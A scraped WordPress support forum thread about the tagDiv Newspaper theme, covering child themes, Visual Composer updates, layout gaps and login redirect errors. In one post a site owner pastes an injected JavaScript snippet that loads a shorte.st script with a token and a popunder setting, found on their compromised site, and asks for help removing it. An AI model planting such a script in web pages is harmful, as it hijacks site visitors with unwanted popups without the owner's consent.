Hi,
@tagdivstar Yes you can use the child theme normally. That will not prevent you from using the child theme.
@Rani You do not have to wait for the next update to use the child theme. The child theme is provided in the theme package and you can use it now. Please follow this guide
– https://forum.tagdiv.com/the-child-theme-support-tutorial/
Simply place the child theme from the code folder, in your themes folder and activate it

Hello Vinay,
Notice that we have added this request to our list of improvements and it is possible for introducing of this plugin in future theme updates but we cannot say for sure if it will be implemented or not, sorry! This is just the decision of our developers.
Thanks for your understanding!
The new tagDiv composer is causing issues on my pages by creating major gaps at the top of the page.
I have 200 pages (not including posts) on my site. How do I update them without having to edit all 200 pages?
Before:
After (tagDiv active):
If I do have to edit them all, what is the simplest way to do so?
Also am curious as to why it all changed?
Great to see effort going into keeping the theme updated, but what are the new benefits?
Are there update about “Nav menu roles”?
Sorry but it’s vey important this feature?
Hi,
How do I get the child theme working before your theme update? It doesn’t recognize Newspaper 8 as the parent.
Cheers.
Hi,
Please go to your plugins section and deactivate the tagDiv composer. Having both Visual composer and tagDiv composer active can create problems in some cases.
Then your Visual composer pages should display properly.
The new front-end page editor is activated by default when the theme is installed or updated to the latest version.
Thanks
Hi,
When Visual composer receives an update, we will first test it and then include it in the theme package. Then it will be officially supported and you can update it
– https://forum.tagdiv.com/how-to-update-visual-composer-plugin/
Please do no not update it from the plugin author if this option is available (purchased Visual composer) and disable the auto-update for this plugin.
Thanks
Hello,
Can I continue using this old child theme (Newspaper 7) until next update?
Thanks.
My sites keeps showing a popup to another site, when I investigate the code – it shows the following:
//
(function() {
var configuration = {
"token": "8f1bc5aa7e697f9829c057cfd305bd64",
"popUnder": {
"enabled": true
}
};
var script = document.createElement('script');
script.async = true;
script.src = '//cdn.shorte.st/link-converter.min.js';
script.onload = script.onreadystatechange = function () {var rs = this.readyState; if (rs && rs != 'complete' && rs != 'loaded') return; shortestMonetization(configuration);};
var entry = document.getElementsByTagName('script')[0];
entry.parentNode.insertBefore(script, entry);
})();
//
I have also noticed other people with the same issue on the Newspaper theme:
https://stackoverflow.com/questions/44038908/how-to-determine-how-someone-is-hacking-my-wordpress-site
Here is a link to my site
https://goo.gl/iHfsxQ
Can you please advise how to fix this, I have removed all wordpress files, updated theme, removed and installed all plugins again, ran wordfence and anti-malware and its still there.
I deleted VC and installed it from the theme panel. Now I have the modules in VC again, but I’m going to play redo the pages I had pre-designed
If I have not misunderstood the problem, so that it does not happen again, should not I update VC?
I made all the steps of the guide and leave the parameters as it says but the widget section and customize continue to throw a white page (WSOD).
Why do I work with version 4.8 and if it works with 4.7.5?
I know wordpress and I know how important it is to keep it updated so I keep finding out. Finally you get the line of code that was in place 3086 of functions.php and this work:
Error Code line 3086 deleted:
$ Encoding = mb_detect_encoding ($ string, mb_detect_order (), true);
The question now is, will I have trouble deleting that line? Could you give me a cleaner solution than this?

Hi,
I believe you might have updated the Visual composer editor. There are many similar topics on the forum. The currently included in the theme package and compatible plugin version is version 5.1.1. It is strongly not recommend to update the editor before it is officially supported. When Visual composer receives an update it will first be tested with the theme and then included in the package
– https://forum.tagdiv.com/how-to-update-visual-composer-plugin/
– https://forum.tagdiv.com/topic/visual-composer-update-21/
What you can try is to deactivate and delete the updated Visual composer plugin, and install the one provided with the theme.
Thanks
Hello Tina,
For more information about how you should use the Child Theme, please check here -> https://forum.tagdiv.com/the-child-theme-support-tutorial/ Notice that child theme is not required to be installed only if you want to make some additional customization through the code and not be lost to a next update of the theme.
Thanks for your understanding!
Found the problem:
On the new server, the hosting provider automatically set the db encoding the latin1, so we had to reimport with utf8.
The WP update_options() method used in your theme seems to have problems with latin1.
Yes, i have installed the 5.2, the problem i usually update automatic all the plugins.
thansk

Hi,
The currently included Visual composer version in the theme package, is version 5.1.1. Please do not update Visual composer to the latest version if you have the option (purchased plugin).
When this editor receives an update, we will test it and include it in the package. Then it will be officially supported by the theme, and it will work properly

Hi,
Please note that it is strongly not recommended to update the Visual composer plugin, before it is officially included in the theme package. The version currently included is 5.1.1
– https://forum.tagdiv.com/how-to-update-visual-composer-plugin/
– https://forum.tagdiv.com/topic/visual-composer-update-21/
When Visual composer receives an update, first we will test it and it will be included in the package. This will ensure full compatibility between the two.
What you could try is to deactivate an delete the updated version, and install the one from the theme’s package.
Thanks
Hello Erythros,
The updated plugin has been tested and it seems to work as expected, without any problems. You can use the update of the plugin and check the results.
Thanks for the message!
Hello sollymans,
Notice that you should not update your plugin, you only use the bundled version, sorry!
Thanks.

Hi,
If you do not have the latest version of the theme (Newspaper 8), then you do not have to worry about the tagDiv composer. Something else has caused this. Try to deactivate all your other plugins except the Visual composer editor, clear any caching installed and check if the problem is fixed.
You could also deactivate and remove the Visual composer from the plugins section, and install it again from your theme package

Please let us know how it goes.
Thanks
Hello dr_vibe,
Do you not have the Trending Now element in Visual Composer like this -> https://www.screencast.com/t/3l82YbBMkL? If not, I suggest you make a full backup to your database and then you should remove the old version and install the latest theme version which can be downloaded from Theme Forest. Ensure that update will be made via FTP way because this is the surest theme method in this regard.
Hope this helps and let us know how it goes!
Thanks for your understanding!
No,
There is no update on this. I did not promise we will make any implementation in this regard. This request needs to become more popular if we are to consider implementing it into our theme.
Thank you!
Hi everyone,
I`ve recently updated my website to Newspaper8 but after that, I can not access my admin panel. When I write admin panel address “www.mysite.com/wp-admin” it ends up with this message
“This page isn’t working
http://www.mysite.net redirected you too many times.
Try clearing your cookies.
ERR_TOO_MANY_REDIRECTS”
But my website is working I can open the website and read post also I can access the admin panel via Edit Page or Edit Post button that is located the top of the website in admin bar. Also, I have tried to open admin panel in Incognito mode Chrome and Safari but it is same.
I appreciate if anyone helps.
You need to set the minimum RAM for WP to 64M in your wp-config.php file.
Check the ‘settings’ checkup in theme panel for more info.
This is most common issue. Also possibly some bad plugins not updated (e.g., Yoast SEO had bugs breaking things; make sure updated, etc.).
Also try clearing transients with wp-optimize plugin.
AND: consider using the ‘limit logins’ plugin to stop hackers; *and* also consider disabling XMLRPC — as this can cause hackers to overload your server trying to post pingbacks or spam comments, etc.
All that stuff impacts ability for PHP to ‘work’ for your site — unrelated to the theme specifically.
Not sure any of that helps — but been suffering this stuff over here with WP for 12 years now, so kinda been hit by everything at one point or another.
🙂
